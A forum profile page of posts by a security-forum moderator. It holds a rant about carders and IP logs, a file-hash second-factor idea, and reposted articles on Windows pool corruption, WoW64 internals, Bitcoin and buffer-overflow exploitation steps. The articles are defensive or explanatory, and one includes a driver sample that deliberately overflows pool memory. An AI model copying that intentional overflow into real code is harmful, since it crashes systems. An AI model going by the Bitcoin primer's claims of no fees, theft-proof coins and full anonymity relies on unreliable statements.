Everything posted by Nytro

  1. Nytro

    Passwords and PMs.

    We tried not to log any IPs at all, but it can't be done because there are problems with logins on vBulletin. For a long time, all IPs were deleted at a set interval. Stupid and useless. What you don't understand, though, is that RST is not the trash can that risks being shut down because of a bunch of losers. In other words, I have no intention of protecting carders or whatever other specimens might be wanted. If someone hacks a site, nobody is going to come asking for logs from RST; they'll take the logs from that site. But if someone sells CCs here, well, the hosting company will wake up with the cops at the door, and I don't want to get into trouble trying to defend some thieves. Also, it's not our problem that Vasile does stupid stuff, comes to RST and posts his name, address and CNP. It's not our job to delete that data. Same with IPs: if you have something to hide, you DON'T USE YOUR REAL IP HERE, and you don't come demanding that IPs be deleted, or your account, or whatever logs. You make a mess, you eat the mess; I couldn't care less about the losers pulling who knows what scams to make 50 dollars. Go work, don't beg. As tex said: if the police come and ask for the server because of some carder, I'll dust it off, put a bow on it and hand them the server.
  2. Nytro

    Passwords and PMs.

    Hmmm, I think I have an idea for two-factor authentication. The variant with messages sent to a phone number is out: 1. I don't know if we'd find a decent SMS service 2. I don't want us to store your phone numbers. But: 1. The user uploads an image 2. A sha1 hash is computed for that image 3. The hash is compared with one stored in the database 4. The file doesn't necessarily have to be an image. Info: the hash is created when the option is activated. Thoughts?
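    A minimal sketch of the file-hash check described above, assuming the hash is computed with OpenSSL's SHA1 and the reference hash is stored as a 40-character hex string (the function name and storage format are illustrative, not the forum's actual implementation):

    #include <stdio.h>
    #include <string.h>
    #include <openssl/sha.h>

    /* Returns 1 if the uploaded file hashes to the stored hex digest, 0 otherwise. */
    int second_factor_ok(const char *path, const char *stored_hex)
    {
        unsigned char buf[4096], digest[SHA_DIGEST_LENGTH];
        char hex[SHA_DIGEST_LENGTH * 2 + 1];
        SHA_CTX ctx;
        size_t n;
        int i;
        FILE *f = fopen(path, "rb");
        if (!f) return 0;

        /* Hash the whole uploaded file in chunks. */
        SHA1_Init(&ctx);
        while ((n = fread(buf, 1, sizeof(buf), f)) > 0)
            SHA1_Update(&ctx, buf, n);
        fclose(f);
        SHA1_Final(digest, &ctx);

        /* Compare against the hash saved when the option was activated. */
        for (i = 0; i < SHA_DIGEST_LENGTH; i++)
            sprintf(hex + i * 2, "%02x", digest[i]);
        return strcmp(hex, stored_hex) == 0;
    }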
  3. Nytro

    Passwords and PMs.

    It would be nice but difficult to implement. Useless; those who needed to have already reset their passwords. Everyone on the staff did it, that was more important. I don't know if it would help with anything. Besides, just as they can be decrypted when read... that's how they can be decrypted... Changing the password is enough. If there are people who care about their account, they changed their password a long time ago. This one could be useful. A page showing the IPs from which someone logged into an account, visible ONLY from that account, that's what you mean, right? It's an idea for the future, we're thinking about something like that; it would be perfect if you came up with some ideas and selection criteria.
  4. Nytro

    executable

    Only from a specific computer, tied to the hardware? Here are a few ideas: c++ - Generating a Hardware-ID on Windows - Stack Overflow More ideas (for example the MAC address): https://www.google.ro/#safe=off&sclient=psy-ab&q=windows+get+unique+hardware+id&oq=windows+get+unique+hardware+id
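    One of the simplest hardware-bound values mentioned in those threads is the volume serial number. A small sketch using the documented GetVolumeInformationA API (an illustration of the idea only; on its own this is not a robust hardware ID):

    #include <stdio.h>
    #include <windows.h>

    int main(void)
    {
        DWORD serial = 0;
        /* Volume serial number of the system drive; it changes only if the volume is reformatted. */
        if (GetVolumeInformationA("C:\\", NULL, 0, &serial, NULL, NULL, NULL, 0)) {
            printf("Volume serial: %08lX\n", serial);
            /* A real check would combine this with other values (e.g. the MAC address)
               and compare the result against a stored fingerprint. */
        }
        return 0;
    }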
  5. Well, practically 340 RON instead of 470 RON is something. It's still 130 RON. Yes, it may be marketing, but for people who are interested it's useful. Example: Asus RT-N56U price list - lowest price
  6. Understanding Pool Corruption Part 1 – Buffer Overflows

ntdebug, 14 Jun 2013 1:50 PM

Before we can discuss pool corruption we must understand what pool is. Pool is kernel mode memory used as a storage space for drivers. Pool is organized in a similar way to how you might use a notepad when taking notes from a lecture or a book. Some notes may be 1 line, others may be many lines. Many different notes are on the same page. Memory is also organized into pages; typically a page of memory is 4KB. The Windows memory manager breaks up this 4KB page into smaller blocks. One block may be as small as 8 bytes or possibly much larger. Each of these blocks exists side by side with other blocks. The !pool command can be used to see the pool blocks stored in a page.

kd> !pool fffffa8003f42000
Pool page fffffa8003f42000 region is Nonpaged pool
*fffffa8003f42000 size: 410 previous size: 0 (Free) *Irp
        Pooltag Irp : Io, IRP packets
 fffffa8003f42410 size: 40 previous size: 410 (Allocated) MmSe
 fffffa8003f42450 size: 150 previous size: 40 (Allocated) File
 fffffa8003f425a0 size: 80 previous size: 150 (Allocated) Even
 fffffa8003f42620 size: c0 previous size: 80 (Allocated) EtwR
 fffffa8003f426e0 size: d0 previous size: c0 (Allocated) CcBc
 fffffa8003f427b0 size: d0 previous size: d0 (Allocated) CcBc
 fffffa8003f42880 size: 20 previous size: d0 (Free) Free
 fffffa8003f428a0 size: d0 previous size: 20 (Allocated) Wait
 fffffa8003f42970 size: 80 previous size: d0 (Allocated) CM44
 fffffa8003f429f0 size: 80 previous size: 80 (Allocated) Even
 fffffa8003f42a70 size: 80 previous size: 80 (Allocated) Even
 fffffa8003f42af0 size: d0 previous size: 80 (Allocated) Wait
 fffffa8003f42bc0 size: 80 previous size: d0 (Allocated) CM44
 fffffa8003f42c40 size: d0 previous size: 80 (Allocated) Wait
 fffffa8003f42d10 size: 230 previous size: d0 (Allocated) ALPC
 fffffa8003f42f40 size: c0 previous size: 230 (Allocated) EtwR

Because many pool allocations are stored in the same page, it is critical that every driver use only the space it has allocated. If DriverA uses more space than it allocated, it will write into the next driver's space (DriverB) and corrupt DriverB's data. This overwrite into the next driver's space is called a buffer overflow. Later either the memory manager or DriverB will attempt to use this corrupted memory and will encounter unexpected information. This unexpected information typically results in a blue screen.

The NotMyFault application from Sysinternals has an option to force a buffer overflow. This can be used to demonstrate pool corruption. Choosing the "Buffer overflow" option and clicking "Crash" will cause a buffer overflow in pool. The system may not immediately blue screen after clicking the Crash button. The system will remain stable until something attempts to use the corrupted memory; using the system will often eventually result in a blue screen.

Often pool corruption appears as a stop 0x19 BAD_POOL_HEADER or stop 0xC2 BAD_POOL_CALLER. These stop codes make it easy to determine that pool corruption is involved in the crash. However, the results of accessing unexpected memory can vary widely; as a result, pool corruption can lead to many different types of bugchecks. As with any blue screen dump analysis, the best place to start is with !analyze -v. This command will display the stop code and parameters, and do some basic interpretation of the crash.
kd> !analyze -v ******************************************************************************* * * * Bugcheck Analysis * * * ******************************************************************************* SYSTEM_SERVICE_EXCEPTION (3b) An exception happened while executing a system service routine. Arguments: Arg1: 00000000c0000005, Exception code that caused the bugcheck Arg2: fffff8009267244a, Address of the instruction which caused the bugcheck Arg3: fffff88004763560, Address of the context record for the exception that caused the bugcheck Arg4: 0000000000000000, zero. In my example the bugcheck was a stop 0x3B SYSTEM_SERVICE_EXCEPTION. The first parameter of this stop code is c0000005, which is a status code for an access violation. An access violation is an attempt to access invalid memory (this error is not related to permissions). Status codes can be looked up in the WDK header ntstatus.h. The !analyze -v command also provides a helpful shortcut to get into the context of the failure. CONTEXT: fffff88004763560 -- (.cxr 0xfffff88004763560;r) Running this command shows us the registers at the time of the crash. kd> .cxr 0xfffff88004763560 rax=4f4f4f4f4f4f4f4f rbx=fffff80092690460 rcx=fffff800926fbc60 rdx=0000000000000000 rsi=0000000000001000 rdi=0000000000000000 rip=fffff8009267244a rsp=fffff88004763f60 rbp=fffff8009268fb40 r8=fffffa8001a1b820 r9=0000000000000001 r10=fffff800926fbc60 r11=0000000000000011 r12=0000000000000000 r13=fffff8009268fb48 r14=0000000000000012 r15=000000006374504d iopl=0 nv up ei pl nz na po nc cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010206 nt!ExAllocatePoolWithTag+0x442: fffff800`9267244a 4c8b4808 mov r9,qword ptr [rax+8] ds:002b:4f4f4f4f`4f4f4f57=???????????????? From the above output we can see that the crash occurred in ExAllocatePoolWithTag, which is a good indication that the crash is due to pool corruption. Often an engineer looking at a dump will stop at this point and conclude that a crash was caused by corruption, however we can go further. The instruction that we failed on was dereferencing rax+8. The rax register contains 4f4f4f4f4f4f4f4f, which does not fit with the canonical form required for pointers on x64 systems. This tells us that the system crashed because the data in rax is expected to be a pointer but it is not one. To determine why rax does not contain the expected data we must examine the instructions prior to where the failure occurred. kd> ub . nt!KzAcquireQueuedSpinLock [inlined in nt!ExAllocatePoolWithTag+0x421]: fffff800`92672429 488d542440 lea rdx,[rsp+40h] fffff800`9267242e 49875500 xchg rdx,qword ptr [r13] fffff800`92672432 4885d2 test rdx,rdx fffff800`92672435 0f85c3030000 jne nt!ExAllocatePoolWithTag+0x7ec (fffff800`926727fe) fffff800`9267243b 48391b cmp qword ptr [rbx],rbx fffff800`9267243e 0f8464060000 je nt!ExAllocatePoolWithTag+0xa94 (fffff800`92672aa8) fffff800`92672444 4c8b03 mov r8,qword ptr [rbx] fffff800`92672447 498b00 mov rax,qword ptr [r8] The assembly shows that rax originated from the data pointed to by r8. The .cxr command we ran earlier shows that r8 is fffffa8001a1b820. If we examine the data at fffffa8001a1b820 we see that it matches the contents of rax, which confirms this memory is the source of the unexpected data in rax. kd> dq fffffa8001a1b820 l1 fffffa80`01a1b820 4f4f4f4f`4f4f4f4f To determine if this unexpected data is caused by pool corruption we can use the !pool command. 
kd> !pool fffffa8001a1b820 Pool page fffffa8001a1b820 region is Nonpaged pool fffffa8001a1b000 size: 810 previous size: 0 (Allocated) None fffffa8001a1b810 doesn't look like a valid small pool allocation, checking to see if the entire page is actually part of a large page allocation... fffffa8001a1b810 is not a valid large pool allocation, checking large session pool... fffffa8001a1b810 is freed (or corrupt) pool Bad previous allocation size @fffffa8001a1b810, last size was 81 *** *** An error (or corruption) in the pool was detected; *** Attempting to diagnose the problem. *** *** Use !poolval fffffa8001a1b000 for more details. Pool page [ fffffa8001a1b000 ] is __inVALID. Analyzing linked list... [ fffffa8001a1b000 --> fffffa8001a1b010 (size = 0x10 bytes)]: Corrupt region Scanning for single bit errors... None found The above output does not look like the !pool command we used earlier. This output shows corruption to the pool header which prevented the command from walking the chain of allocations. The above output shows that there is an allocation at fffffa8001a1b000 of size 810. If we look at this memory we should see a pool header. Instead what we see is a pattern of 4f4f4f4f`4f4f4f4f. kd> dq fffffa8001a1b000 + 810 fffffa80`01a1b810 4f4f4f4f`4f4f4f4f 4f4f4f4f`4f4f4f4f fffffa80`01a1b820 4f4f4f4f`4f4f4f4f 4f4f4f4f`4f4f4f4f fffffa80`01a1b830 4f4f4f4f`4f4f4f4f 00574f4c`46524556 fffffa80`01a1b840 00000000`00000000 00000000`00000000 fffffa80`01a1b850 00000000`00000000 00000000`00000000 fffffa80`01a1b860 00000000`00000000 00000000`00000000 fffffa80`01a1b870 00000000`00000000 00000000`00000000 fffffa80`01a1b880 00000000`00000000 00000000`00000000 At this point we can be confident that the system crashed because of pool corruption. Because the corruption occurred in the past, and a dump is a snapshot of the current state of the system, there is no concrete evidence to indicate how the memory came to be corrupted. It is possible the driver that allocated the pool block immediately preceding the corruption is the one that wrote to the wrong location and caused this corruption. This pool block is marked with the tag “None”, we can search for this tag in memory to determine which drivers use it. kd> !for_each_module s -a @#Base @#End "None" fffff800`92411bc2 4e 6f 6e 65 e9 45 04 26-00 90 90 90 90 90 90 90 None.E.&........ kd> u fffff800`92411bc2-1 nt!ExAllocatePool+0x1: fffff800`92411bc1 b84e6f6e65 mov eax,656E6F4Eh fffff800`92411bc6 e945042600 jmp nt!ExAllocatePoolWithTag (fffff800`92672010) fffff800`92411bcb 90 nop The file Pooltag.txt lists the pool tags used for pool allocations by kernel-mode components and drivers supplied with Windows, the associated file or component (if known), and the name of the component. Pooltag.txt is installed with Debugging Tools for Windows (in the triage folder) and with the Windows WDK (in \tools\other\platform\poolmon). Pooltag.txt shows the following for this tag: None - <unknown> - call to ExAllocatePool Unfortunately what we find is that this tag is used when a driver calls ExAllocatePool, which does not specify a tag. This does not allow us to determine what driver allocated the block prior to the corruption. Even if we could tie the tag back to a driver it may not be sufficient to conclude that the driver using this tag is the one that corrupted the memory. The next step should be to enable special pool and hope to catch the corruptor in the act. We will discuss special pool in our next article. 
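The kind of overwrite described in this article can be reproduced deliberately from a small test driver. A minimal sketch (assumed for illustration, not taken from NotMyFault's source) that allocates a small nonpaged pool block and then writes past its end, trashing the following block's pool header:

#include <ntddk.h>

NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath)
{
    PUCHAR p;

    UNREFERENCED_PARAMETER(DriverObject);
    UNREFERENCED_PARAMETER(RegistryPath);

    /* Allocate 0x20 bytes of nonpaged pool with an arbitrary tag. */
    p = (PUCHAR)ExAllocatePoolWithTag(NonPagedPool, 0x20, 'looP');
    if (p == NULL)
        return STATUS_INSUFFICIENT_RESOURCES;

    /* BUG: fills 0x80 bytes in a 0x20-byte allocation, overwriting the next
       block's pool header with a recognizable pattern (compare the 0x4f bytes
       seen in the dump above). The blue screen happens later, when the memory
       manager or the neighbouring driver touches the corrupted block. */
    RtlFillMemory(p, 0x80, 0x4F);

    ExFreePoolWithTag(p, 'looP');
    return STATUS_SUCCESS;
}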
Sursa: Understanding Pool Corruption Part 1 – Buffer Overflows - Ntdebugging Blog - Site Home - MSDN Blogs
  7. [h=2]WoW64 internals: Tale of GetSystemFileCacheSize[/h]June 28, 2013 / ReWolf Few days ago someone asked me if I can somehow add GetSystemFileCacheSize to wow64ext library. I’ve researched this topic a bit and the final answer is no, because it is not necessary. In today post I’ll try to describe internals of GetSystemFileCacheSize function and its limitations, I’ll also show the different way of obtaining the same information as original GetSystemFileCacheSize. [h=3]GetSystemFileCacheSize internals[/h] Body of the function can be found inside kernel32 library, it is pretty simple: BOOL WINAPI GetSystemFileCacheSize ( PSIZE_T lpMinimumFileCacheSize, PSIZE_T lpMaximumFileCacheSize, PDWORD lpFlags ) { BYTE* _teb32 = (BYTE*)__readfsdword(0x18); // mov eax, large fs:18h BYTE* _teb64 = *(BYTE**)(_teb32 + 0xF70); // mov eax, [eax+0F70h] DWORD unk_v = **(DWORD**)(_teb64 + 0x14D0); // mov eax, [eax+14D0h] SYSTEM_FILECACHE_INFORMATION sfi; //SystemFileCacheInformationEx = 0x51 NTSTATUS ret = NtQuerySystemInformation((SYSTEM_INFORMATION_CLASS)0x51, &sfi, sizeof(sfi), 0); if (ret < 0) { BaseSetLastNTError(ret); return FALSE; } if ((unsigned int)sfi.MinimumWorkingSet * (unsigned __int64)unk_v > 0xFFFFFFFF || (unsigned int)sfi.MaximumWorkingSet * (unsigned __int64)unk_v > 0xFFFFFFFF ) { BaseSetLastNTError(STATUS_INTEGER_OVERFLOW); return FALSE; } *lpMinimumFileCacheSize = unk_v * sfi.MinimumWorkingSet; *lpMaximumFileCacheSize = unk_v * sfi.MaximumWorkingSet; *lpFlags = 0; if (sfi.Flags & FILE_CACHE_MIN_HARD_ENABLE) *lpFlags = FILE_CACHE_MIN_HARD_ENABLE; if (sfi.Flags & FILE_CACHE_MAX_HARD_ENABLE) *lpFlags |= FILE_CACHE_MAX_HARD_ENABLE; return TRUE; } So, let’s study it step by step. At first it gets some magic value from the TEB, figuring out where this value came from is the key to understand the whole function. FS:0×18 contains TEB32 pointer, next instruction gets another pointer from TEB32+0xF70, according to PDB symbols, this field is called GdiBatchCount: TEB32: ... +0xf6c WinSockData : Ptr32 Void +0xf70 GdiBatchCount : Uint4B +0xf74 CurrentIdealProcessor : _PROCESSOR_NUMBER ... First surprise, in WoW64 this field contains pointer to x64 TEB (yes, in WoW64 processes there are two TEBs, x86 and x64, as well as two PEBs, but regular readers of this blog probably already knew it ). In third step, it gets value from TEB64+0x14D0, according to PDB symbols it is one of the entries inside TlsSlots: TEB64: ... +0x1478 DeallocationStack : Ptr64 Void +0x1480 TlsSlots : [64] Ptr64 Void +0x1680 TlsLinks : _LIST_ENTRY ... Precisely speaking it is TEB64.TlsSlot[0x0A]. It took me some time to track the code responsible for writing to this particular TlsSlot, but I’ve succeeded. There is only one place inside wow64.dll that writes at this address: ;wow64.dll::Wow64LdrpInitialize: ... .text:0000000078BDC15C mov rax, gs:30h .text:0000000078BDC165 mov rdi, rcx .text:0000000078BDC168 xor r13d, r13d .text:0000000078BDC16B mov ecx, [rax+2030h] .text:0000000078BDC171 or r15, 0FFFFFFFFFFFFFFFFh .text:0000000078BDC175 mov r14d, 1 .text:0000000078BDC17B add rcx, 248h .text:0000000078BDC182 mov cs:Wow64InfoPtr, rcx .text:0000000078BDC189 mov rcx, gs:30h .text:0000000078BDC192 mov rax, cs:Wow64InfoPtr .text:0000000078BDC199 mov [rcx+14D0h], rax ;<- write to TlsSlot ... Above snippet is a part of the Wow64LdrpInitialize function (it is exported from wow64.dll) and there are a few interesting things. 
At first it gets TEB64 address from GS:0×30 (standard procedure on x64 windows), then it gets address from TEB64+0×2030, adds 0×248 to this address and stores this value in TEB64.TlsSlot[0x0A]. It stores it also in a variable called Wow64InfoPtr. Looking at this code under debugger reveals more interesting details, apparently TEB64+0×2000 points to TEB32, TEB32+0×30 contains pointer to PEB32: TEB32: ... +0x02c ThreadLocalStoragePointer : 0x7efdd02c +0x030 ProcessEnvironmentBlock : 0x7efde000 _PEB +0x034 LastErrorValue : 0 ... So, there is some mystical Wow64InfoPtr structure at PEB32+0×248 address. On Windows 7, 0×248 is the exact size of PEB32 structure (aligned to 8, on windows Vista it is 0×238, probably on Windows 8 it will be also different), so this new structure follows PEB32. Querying google for Wow64InfoPtr returns 0 results. Judging from the references, this structure contains at least three fields, I was interested only in the first one: ;wow64.dll::ProcessInit: ... .text:0000000078BD8F70 mov rax, cs:Wow64InfoPtr .text:0000000078BD8F77 mov edx, 1 .text:0000000078BD8F7C and dword ptr [rax+8], 0 .text:0000000078BD8F80 mov dword ptr [rax], 1000h ... Above code is part of the wow64.dll::ProcessInit function, and it has hardcoded 0×1000 value that is assigned to the first field of the Wow64InfoPtr structure. Summing things up, those first three operations at the begining of GetSystemFileCacheSize are just getting hardcoded 0×1000 value. I can guess, that this value represents size of the memory page inside WoW64 process, I can also confirm this guess by looking at the x64 version of GetSystemFileCacheSize: ;kernel32.dll::GetSystemFileCacheSize: ... .text:0000000078D67CF6 mov eax, cs:SysInfo.uPageSize .text:0000000078D67CFC mov ecx, [rsp+68h+var_48.Flags] .text:0000000078D67D00 imul rax, [rsp+68h+var_48.MinimumWorkingSet] .text:0000000078D67D06 mov [rsi], rax .text:0000000078D67D09 mov eax, cs:SysInfo.uPageSize .text:0000000078D67D0F imul rax, [rsp+68h+var_48.MaximumWorkingSet] ... Further part of the function is clear, it calls NtQuerySystemInformation with SYSTEM_INFORMATION_CLASS set to SystemFileCacheInformationEx (0×51). After this call SYSTEM_FILECACHE_INFORMATION structure is filled with desired information: typedef struct _SYSTEM_FILECACHE_INFORMATION { SIZE_T CurrentSize; SIZE_T PeakSize; ULONG PageFaultCount; SIZE_T MinimumWorkingSet; SIZE_T MaximumWorkingSet; SIZE_T CurrentSizeIncludingTransitionInPages; SIZE_T PeakSizeIncludingTransitionInPages; ULONG TransitionRePurposeCount; ULONG Flags; } SYSTEM_FILECACHE_INFORMATION, *PSYSTEM_FILECACHE_INFORMATION; At this point function verifies if output values (lpMinimumFileCacheSize and lpMaximumFileCacheSize) fits in 32bits: if ((unsigned int)sfi.MinimumWorkingSet * (unsigned __int64)unk_v > 0xFFFFFFFF || (unsigned int)sfi.MaximumWorkingSet * (unsigned __int64)unk_v > 0xFFFFFFFF ) { ... } With the default (?) system settings lpMaximumFileCacheSize will exceed 32bits, because sfi.MaximumWorkingSet is set to 0×10000000 and unk_v (page size) is 0×1000, so multiplication of those values wouldn’t fit in 32bits. In that case function will return FALSE and set last Win32 error to ERROR_ARITHMETIC_OVERFLOW (0×00000216). 
GetSystemFileCacheSize replacement

I'm not really sure if there is a proper (and documented) way to replace this function, but one can use NtQuerySystemInformation with the SystemFileCacheInformationEx (0x51) or SystemFileCacheInformation (0x15) classes; both classes use the same SYSTEM_FILECACHE_INFORMATION structure. SystemFileCacheInformation (0x15) is used by the Sysinternals CacheSet tool. To get exactly the same values as from GetSystemFileCacheSize, the results returned by NtQuerySystemInformation should be adjusted as in the snippet below:

lpMinimumFileCacheSize = PAGE_SIZE * sfi.MinimumWorkingSet;
lpMaximumFileCacheSize = PAGE_SIZE * sfi.MaximumWorkingSet;
lpFlags = 0;
if (sfi.Flags & FILE_CACHE_MIN_HARD_ENABLE) lpFlags = FILE_CACHE_MIN_HARD_ENABLE;
if (sfi.Flags & FILE_CACHE_MAX_HARD_ENABLE) lpFlags |= FILE_CACHE_MAX_HARD_ENABLE;

Thanks for reading.

Sursa: WoW64 internals: Tale of GetSystemFileCacheSize
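A self-contained sketch of that replacement, resolving NtQuerySystemInformation dynamically and using SystemFileCacheInformation (0x15) with the structure defined in the article (error handling trimmed; treat it as an illustration rather than a drop-in API):

#include <stdio.h>
#include <windows.h>

typedef struct _SYSTEM_FILECACHE_INFORMATION {
    SIZE_T CurrentSize;
    SIZE_T PeakSize;
    ULONG  PageFaultCount;
    SIZE_T MinimumWorkingSet;
    SIZE_T MaximumWorkingSet;
    SIZE_T CurrentSizeIncludingTransitionInPages;
    SIZE_T PeakSizeIncludingTransitionInPages;
    ULONG  TransitionRePurposeCount;
    ULONG  Flags;
} SYSTEM_FILECACHE_INFORMATION;

typedef LONG (NTAPI *NtQuerySystemInformation_t)(ULONG, PVOID, ULONG, PULONG);

int main(void)
{
    SYSTEM_FILECACHE_INFORMATION sfi = {0};
    SYSTEM_INFO si;
    NtQuerySystemInformation_t NtQSI = (NtQuerySystemInformation_t)
        GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtQuerySystemInformation");

    if (!NtQSI || NtQSI(0x15 /* SystemFileCacheInformation */, &sfi, sizeof(sfi), NULL) < 0)
        return 1;

    /* si.dwPageSize plays the role of the hardcoded 0x1000 value from Wow64InfoPtr. */
    GetSystemInfo(&si);

    printf("MinimumFileCacheSize: %Iu bytes\n", (SIZE_T)si.dwPageSize * sfi.MinimumWorkingSet);
    printf("MaximumFileCacheSize: %Iu bytes\n", (SIZE_T)si.dwPageSize * sfi.MaximumWorkingSet);
    printf("Flags: 0x%lx\n", sfi.Flags);
    return 0;
}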
  8. What is Bitcoin? Rohit Shaw June 28, 2013 Bitcoin is a digital currency or, we might say, electronic cash that uses peer-to-peer technology for transactions. Here peer-to-peer means it is not managed by any central authority. Normal currencies are managed by a central bank but Bitcoin is managed collectively by the network. The Bitcoin software was developed by Satoshi Nakamoto and it is based on open source cryptographic protocol. Each Bitcoin is subdivided down to eight decimal places, forming 100 million smaller units called satoshis. In simple terms, it is a SHA-256 hash in a hexadecimal format. Interesting facts about Bitcoin: Bitcoin is a digital currency. Because it is digital, you can literally backup your money, so, when properly cared for, it can’t be: Lost Stolen Frozen or seized. [*] Allows a direct and immediate transfer of value between two people anywhere in the world. [*] No banks, governments, or organizations control or influence it. [*] Cannot be counterfeited, inflated, printed, or devalued over time. [*] A peer-to-peer network functions as a distributed authority to record transactions. [*] Bitcoin operates on free, open-source software on any computer or smart phone. [*] There are no start-up, transaction, or usage fees. [*] Purchases can be completely anonymous. [*] Transactions cannot be reversed. [*] Privacy is enhanced with Bitcoin and it reduces identity theft. [*] Bitcoins can be exchanged in open markets for any other currency. Bitcoin Storage Media We already know that Bitcoin is digital currency and we are not able cash it out. In our world we handle our cash in our wallet or keep it in the bank. Here we do the same: We stored the Bitcoins in a Bitwallet. We can download the Bitwallet client software from http://bitcoin.org . This client software is compatible with Windows, MAC, and Linux operating systems. We can see the look of Bitwallet client software. We can see the overview of Bitcoin wallet in the figure above. Our balance is showing 0.00BTC, which means we have nothing right now. We also see few options in upper side bar: send coins, receive coins, transactions, address book, and export. Now we can see in the figure below, in the Receive coins option, a long alphanumeric string under the address tab. This is our Bitcoin address, which is used for transactions, mainly for receiving Bitcoins in the form of payments. It is more like a bank account number which is used for sending or receiving money. It is a cryptographic public key in human-readable strings and it consists of alphanumeric characters, for example, 17zMBU1enmZALpbDPeo5UGXFYBWbAg7MdR Next we are moving to the Send coins option; here we can see that there is an option for sending coins by adding their Bitcoin address in the Pay To section, then giving the Bitcoin in the Amount section, and clicking on Send to transfer it to the destination address. Next we will see how to use the Bitcoin online wallet. We can create an online wallet account from the following link https://blockchain.info/wallet/. Here is a snapshot of my online wallet account that I created. We can see what our online wallet it looks like in our client software. We have our Bitcoin address and we can see the account balance also, which is zero. And the same options are available here from the Bitcoin client software: Send Money, Receive Money, My transactions, and import/Export. How to Acquire Bitcoins? Acquiring Bitcoins is like the two sides of a coin. One side is very easy and other side is tough. 
There are two methods for earning Bitcoins. First is the easy method, purchasing online, and the second is by mining from online servers. We will cover both topics in this article. There are many online vendors who are trading in Bitcoins, such as BIPS, Bitbox, MtGox, bitNZ, Bitstamp, BTC-E, VertEx, etc. Here we are going to show you how to purchase Bitcoin from these vendors; for example, we are using MtGox for purchasing. Go to the following website https://mtgox.com/ and sign up for an account. We can see in the figure below how it looks after signing in. We can see in the above figure that there are two main options: Buy bitcoins and Sell bitcoins. If you want to buy, just give the number of Bitcoins in the Amount of BTC to BUY section and we can see that the price per coins is 122.00001 US dollar. Suppose we are buying 50 BTC; let us see how much USD we have to spend. We can see that we have to spend 6100 USD for purchasing 50 BTC. So we see here that purchasing Bitcoins is not a big deal, just we have to invest money for it. Now we will show you the tough and interesting part of earning Bitcoins from mining from online server. Mining Bitcoins is a process in which we run Bitcoin mining software, which solves complex mathematical equations in a mining server. If we are able to solve one of these equations, we will get paid in Bitcoins. Now we have to join a pool mining server. A pool is a group that combines their computing power to make more Bitcoins. We can’t mine alone in a server because these coins are awarded in blocks, usually 50 at a time. In this block you are given smaller and easier algorithms to solve and all of your combined work will solve the bigger algorithms. The earned Bitcoins are shared according to how much work you as an individual miner have contributed. Pool Features: All the features you’ll expect a Bitcoin pool to have, including instant pay per share. Merged mining; get bonus Namecoins to improve profits or register .bit domains. Best in the industry graphs, statistics, and monitoring. Mining teams for competitions, charity, or just to organize your mining farms. Statistics page for viewing average shares, estimated earnings per block, hashrate and more. Forgot password feature. Dashboard with balance, average speed, shares and stale viewing, instant payout to Bitcoin address, worker creation and statistics for each worker. API for both user and total pool. Fully customizable. The pool in which I am involved in is called BitMinter. I will show you how to join this pool server. Follow the link https://bitminter.com and sign up for account. In above figure we can see that the signup form asks for Worker name and password. Basically, for every miner that you have running, you will need to have a worker ID so the pool can keep track of your contributions. You can also see this worker after creating the account by going to MY ACCOUNT> Workers and here we can see our worker name, craker, is showing. Now that our pool account is ready, what we need Bitcoin mining software. First we have to install Bitcoin mining client software. There are many software programs available, such as BitMinter, 50Miner, Bit Moose, GUIMiner etc. We can use any one of these for mining but we are using here Bit Minter, which can be downloaded from this link https://bitminter.com/. We can see the BitMinter client software in the above figure. In the top left side it shows my CPU processor name and below that is my GPU name, GeForce GT 620M. 
In the status panel we can see it showing the message “Found 1 OpenCL-compatible GPU,” which means my GPU card is detected by this software. Now we can start our mining process. Run the program and click on the play button and then it will ask for your pool server account details which we already created. Give the details and then click on Proceed. Now we can see that our process is running and we can see our GPU mining speed in the speedometer. The speed which we are getting here is 12.97Mhps, which is not very fast. If we are using two or more expensive graphic cards with a high GPU core, we will get a higher speed. We are not using our CPU power because it will not give much speed but it will burn our system by getting overheated. GPU is always better than CPU for this purpose. A CPU is an executive and a GPU is a laborer. A CPU is designed primarily to be an executive and make decisions, as directed by the software. A GPU is very different. Yes, a GPU can do math, and can also do “this” and “that” based on specific conditions. GPUs have large numbers of ALUs, more so than CPUs. As a result, they can do large amounts of bulky mathematical labor in a greater quantity than CPUs. Let us see the mining status. For this go to Tools>Mining status. Here is our status: Now go to the account details option and there you will find your cash out settings. Add your Bitcoin address there; once you have earned Bitcoins, you can transfer them into your wallet via that address. What to Do with Bitcoins? Bitcoins work the same as paper money with some key differences. The Bitcoin price fluctuates so, if you invest wisely, you can make a decent amount of money by selling and buying them. Several business accept Bitcoin as a form of payment for services like Internet and mobile services, design, web hosting, email services, and VOIP/SMS services, as well as gambling sites. So Bitcoin can be used in many services as a made of payment. For example, we can see in the figure below that a security service allows Bitcoin as form of payment. References: What Is Bitcoin and What Can I Do With It? https://en.bitcoin.it/wiki/Main_Page Bitcoin - Wikipedia, the free encyclopedia Beginners Guide to Mining Bitcoins Sursa: What is Bitcoin?
  9. Windows Memory Protection Mechanisms Dejan Lukan July 05, 2013 Introduction When trying to protect memory from being maliciously used by the hackers, we must first understand how everything fits in the whole picture. Let’s describe how a buffer overflow is exploited: Finding Input Shellcode Address—When we send input data to the application, we must send data that will cause a buffer overflow to be triggered. But we must write the input data in such a way that we’ll include the address that points to our shellcode that was also input as part of the input data. This is needed so the program execution can later jump to the shellcode by using that shellcode memory address pointer. Data Structure Overwrite—In order for the program to actually jump to our shellcode, we must overwrite some data structure where the address is read from and jumped to. An example of such a structure is a function frame that’s stored on the stack every time a function is called; besides all the other stuff stored on the stack, one of them is also the return EIP address where the function will return when it’s done with the execution. If we over write that address with the address of our shellcode in memory, the program execution will effectively jump to that address and execute our shellcode. Finding the System Function’s Address—When our shellcode is being executed, it will often call various system functions, which we don’t know the addresses of. We can hardcode the addresses of the functions to call in the shellcode itself, but that wouldn’t be very portable and it often won’t work on modern systems because of the various memory protection mechanisms in place. In order to find the addresses of the functions that we want to call, we must dynamically find them upon the shellcode execution. We must mention that if only one of the above conditions is not true, then the buffer exploitation will fail and we won’t be able to execute our shellcode. This is an important observation because, if we’re not able to satisfy every condition, the exploit will not work and the attack will be prevented. Next, we’ll discuss the techniques we can use to prevent one (or many) of the above conditions from being satisfied by malicious hackers. Let’s mention it again: If we’re able to prevent hackers from satisfying at least one of the above conditions, then the exploitation of the buffer overflow will fail. This is 